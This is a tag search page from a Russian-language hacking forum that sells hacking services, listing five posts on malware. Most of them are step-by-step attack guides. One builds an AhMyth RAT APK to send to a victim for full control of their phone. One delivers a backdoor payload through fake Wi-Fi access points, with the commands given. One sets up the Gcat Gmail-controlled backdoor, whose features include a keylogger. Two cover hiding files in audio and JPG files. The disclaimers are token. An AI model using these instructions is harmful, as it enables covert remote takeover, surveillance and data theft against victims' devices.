Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'вредносное по'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 5 results

  1. Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как взломать и управлять смартфоном удаленно. AhMyth RAT - это приложение с открытым исходным кодом, доступное только в бета-версии. Инструмент нацелен на пользователей Windows, но шрифты AhMyth также можно загрузить с GitHub для UNIX-подобных платформ, отмечают эксперты по мобильному взлому. Установка: Устанавливаем Java Скачиваем AhMyth RAT Создаём вредоносный APK: Чтобы создать файл APK для Android, откройте вкладку APK Builder. В поле IP-адреса источника необходимо ввести IP-адрес атакующей машины. В поле Source port вы можете указать порт, который машина зарезервирует для прослушивания соединений (порт по умолчанию - 42,474). Затем нажмите кнопку «Создать»; по умолчанию зараженный файл сохраняется в следующей папке: C:UsersAhMythOutput Готово! Теперь осталось отправить жертве данный APK файл. Вот таким простым способом вы можете взломать и получить полный доступ над каким-либо смартфоном, поэтому пользуйтесь пока данный метод работает. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  2. Привет, хакеры! Сегодня я расскажу о способе заражения жертвы вирусом через сеть Wi-Fi. Итак, у нас есть в наличии backdoor payload. Не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения. В данной схеме мы проводим атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом. На заметку: Вы можете использовать MANA-Toolkit: https://github.com/sensepost/mana. Допустим у нас есть пейлоад “fec8b00011ddc00945f1”. Что же нам необходимо делать далее? Шаг 1 Нам необходимо создать фейковую точку доступа, которую мы назовём "Фейк" (что бы вам было понятнее) и мак адрес, у неё будет 00:fe:c8:b0:00:11 Мак адрес 00:fe:c8:b0:00:11 это наш загружаемый пейлоад т.к. название нашего пейлоада “fec8b00011ddc00945f1”Это секция пейлоада “fec8b00011ddc00945f1”Шаг 2 Система с беком сканит ESSID нашего фейка и дампит BSSID для неё. Наш код должен сделать так: fe:c8:b0:00:11 ==> fec8b00011Шаг 3 Атакующая система создаёт фейковую точку доступа с именем "Фейк" и маком 00:dd:c0:09:45:f1 Мак-адрес 00:dd:c0:09:45:f1 это наш инжектируемый пейлоад “ddc00945f1”Это секция пейлоада “fec8b00011ddc00945f1”Шаг 4 Система с бекдором должна дампить данную секцию BSSID или мак dd:c0:09:45:f1 ==> ddc00945f1 После данных шагов со сканом мы имеем пейлоад fec8b00011ddc00945f1 в инфицированной системе. Теперь, разобравшись как работает данный метод мы рассмотрим команды для создания фейк AP: ifconfig wlan0 down iw reg set BO ifconfig wlan0 up iwconfig wlan0 txpower 30 С помощью этих команд мы увеличиваем мощность нашей AP. Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера. Далее пойдут команды с кратким описанием: airmon-ng start wlan0 - запускаем интерфейс; airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon - делаем первый кусок пейлоада; sleep 15 - дайте точке поспать 15 секунд; killall airbase-ng - если у точки бессонница; airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon - второй кусок пейлоада; sleep 15 - дайте точке поспать 15 секунд; killall airbase-ng - если у точки бессонница. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Сейчас я хотел бы рассмотреть два интересных способа скрытия данных в аудиофайле. В первом случае мы воспользуемся утилитой DeepSound — той самой программой, которую использовал Эллиот в сериале “Мистер Робот” для скрытия данных на дисках с музыкальными альбомами. С программой справиться даже последний ламер: в верхней части нужно добавить обычный аудиофайл - это может быть допустим музыка или подкаст, а в нижней части те самые секретные файлы, которые нужно спрятать. Допустим необходимо скрыть приватный ключ от биткоин кошелька. Для этого в верхней части программы нажимаем кнопку “Open carriers files” и выбираем любой аудиофайл. Ну а теперь добавляем наши секретные файлы кнопкой “Add secret files” , после чего нажимаем на “Encode secret file” и указываем пароль для доступа. В итоге мы получаем аудиофайл, который выглядит и воспроизводится как обычная музыкальная запись. Ну и для расшифровки нужно также выбрать наш зашифрованный аудиофайл кнопкой “Open carriers files”, ввести пароль если ранее вы его устанавливали, после чего нажать на “Extract secret file”. На выходе мы получаем те самые зашифрованные файлы. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Всем привет, сейчас я вам собираюсь показать, как можно очень быстро спрятать файл прямо в картинку формата jpg. Для этого нам нужно конечно найти картинку, в которой будем прятать файл. Чтобы вам было проще, просто переместите картинку на раб. стол и дайте ей название 123, после чего создаем архив на столе к примеру с названием 321. Что же у нас есть? 123.jpg – та самая картинка, в котором будет спрятан архив 321.rar – тот самый архив который мы будем прятать в картинке Теперь нам нужно открыть блокнот и ввести следующий код: copy /b 123.JPG + 321.rar 888.jpg Сохраняем это как 1.bat, после чего запускаем Итак, как же это понимать? JPG – это картинка Rar – это файл888.jpg – это уже созданная картинка с архивом внутри. После этого нам необходимо открыть картинку таким образом “открыть как…”, в открывшийся архив мы закидываем все что нам нужно. Теперь мы можем передавать кому-нибудь эту картинку, он в свою очередь сможет доставать из нее файлы. На этом можно закончить. На самом деле этот способ скрытия информации очень эффективен и полезен. Таким образом вы можете легко спрятать какие-то важные данные на вашем компьютере, вряд ли кто-то догадается открыть через архиватор картинку.
  5. Всем привет, в этой статье я хочу вам показать один из бесплатных троянов, который написан на питоне, а именно о Gcat. Gcat является скрытным бэкдором написанным соответственно на питоне. Он использует почтовый сервис Gmail, для так называемого command and control сервера. Чтобы данный троян мог работать, ему понадобится почта на данном сервиса, вместе с включенной функцией Allow less secure apps, которую можно включать в настройках вашей учетной записи. Данный нам репозиторий содержит в себе всего лишь 2 файла: Gcat.py – сам скрипт, который перечисляет все доступные клиенты и передает им командыImplant.py – является самим бэкдоромЧтобы все заработало, нужно изменить всего лишь две переменные, а именно: gmail_user, gmail_pwd. Итак, клиент предоставляем нам обширные возможности, можно выполнить такие команды: Выполнение команд, удаленное скачивание файлов у жертвы, после отправки шелл кода его можно выполнить, скачать скрин экрана, отключить экран жертвы, запустить и отключить кейлогер. Вот так выглядит запуск различных команд в клиенте: # python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-cmd ‘ipconfig /all’ [*] Command sent successfully with jobid: SH3C4gv После чего запрашиваем результат для определенного Id и JobId: # python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-jobid SH3C4gv DATE: ‘Tue, 09 Jun 2015 06:51:44 -0700 (PDT)’ JOBID: SH3C4gv FG WINDOW: ‘Command Prompt - C:Python27python.exe implant.py’ CMD: ‘ipconfig /all’ Если будет нехватка чего-либо, то это легко исправить, просто дописав необходимые компоненты. Ссылка для скачивания репозитория: github.com/byt3bl33d3r/gcat Данный троян можно запустить на таких операционных системах как Windows и различные Unix-подобные системы.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.